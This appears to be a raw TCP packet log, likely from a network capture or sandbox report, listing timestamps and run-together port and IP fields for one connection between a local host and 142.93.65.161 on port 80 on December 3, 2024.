                                                                                                                                                                                  Dec 3, 2024 14:01:54.865263939 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.866641998 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.866662979 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.866707087 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.868282080 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.868361950 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.868405104 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.869792938 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.869927883 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.869971037 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.871339083 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.871455908 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.871496916 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.872977018 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.873050928 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.873114109 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.874577045 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.874891996 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.874953032 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.876190901 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.876203060 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.876243114 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.877769947 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.877902985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.877943039 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.879317045 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.879394054 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.879437923 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.880848885 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.880959034 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.881010056 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986128092 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986145020 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986243963 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986433983 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987196922 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987209082 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987251997 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987874985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.988209963 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.988265991 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990263939 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990278006 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990315914 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990744114 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990799904 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990843058 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.991945982 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.992528915 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.992572069 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.993350029 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.993362904 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.993402958 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.994651079 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.994987011 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.995038033 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.995882988 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.996051073 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.996100903 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.997267008 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.997281075 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.997322083 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.998593092 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.998605013 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.998648882 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.999732971 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.999746084 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.999779940 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.000947952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.001159906 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.001204967 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.002223015 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.002434969 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.002476931 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.003353119 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.003591061 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.003629923 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.004652023 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.004664898 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.004695892 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.006063938 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.006078005 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.006110907 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.007023096 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.007411003 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.007458925 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.008636951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.008651018 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.008682966 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.009392977 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.009639978 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.009680986 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.010632038 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.010761023 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.010799885 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.011828899 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.012088060 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.012131929 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.013098955 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.013160944 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.013200998 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.014244080 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.014334917 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.014384985 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.015450001 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.015547991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.015598059 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.016746044 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.016798973 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.016845942 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.017884016 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.018052101 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.018099070 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.019119024 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.019350052 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.019402981 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.020313978 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.020576954 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.020627975 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.021481991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.021673918 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.021724939 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.022706985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.022923946 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.022974014 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.023916006 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.024003983 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.024049997 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.025090933 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.025207043 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.025250912 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.026293993 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.026477098 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.026523113 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.027493954 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.027600050 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.027637005 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.028693914 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.028841019 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.028887033 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.029922962 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.030085087 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.030133963 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.031125069 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.031224012 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.031275034 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.032335997 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.032449961 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.032500982 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.033574104 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.033632040 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.033699036 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.034765959 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.034981966 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.035027027 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.035973072 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.036151886 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.036200047 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.037193060 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.037261963 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.037306070 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.038355112 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.038443089 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.038485050 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.039552927 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.039681911 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.039726973 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.040795088 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.041007042 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.041050911 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.042027950 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.042041063 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.042077065 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.043201923 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.043301105 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.043348074 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.044418097 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.044874907 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.044925928 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.045666933 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.045787096 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.045834064 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.046855927 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.046964884 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.047018051 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.048012972 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.048140049 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.048192024 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.049220085 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.049586058 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.049633980 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.187319994 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.187517881 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.187587976 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.187774897 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.187921047 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.187968016 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.188905954 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.189179897 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.189234018 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.190051079 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.190162897 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.190211058 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.191106081 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.191188097 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.191235065 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.192222118 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.192390919 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.192437887 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.193622112 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.193737984 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.193784952 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.194957018 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.195063114 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.195099115 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.195864916 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.195905924 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.195959091 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.196984053 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.196999073 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.197032928 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.197722912 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.197871923 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.197918892 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.198823929 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.198887110 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.198929071 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.200048923 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.200223923 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.200270891 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.201164961 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.201318026 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.201364040 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.202064991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.202238083 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.202280045 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.203213930 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.203385115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.203428030 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.204335928 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.204411030 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.204451084 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.205377102 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.205467939 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.205511093 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.206501007 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.206675053 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.206715107 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.207590103 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.207732916 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.207773924 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.208761930 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.208858967 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.208899021 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.209831953 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.209959984 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.210287094 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.211189032 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.211499929 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.211539984 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.212024927 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.212188959 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.212228060 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.213443041 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.213501930 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.213545084 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.214447021 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.214459896 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.214495897 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.215353966 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.215497017 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.215542078 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.216444969 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.216579914 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.216626883 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.217514992 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.217612028 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.217658043 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.221791029 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.221858978 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.221870899 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.221915007 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.221999884 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222013950 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222027063 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222049952 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222158909 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222172022 CET8049181142.93.65.161192.168.2.22
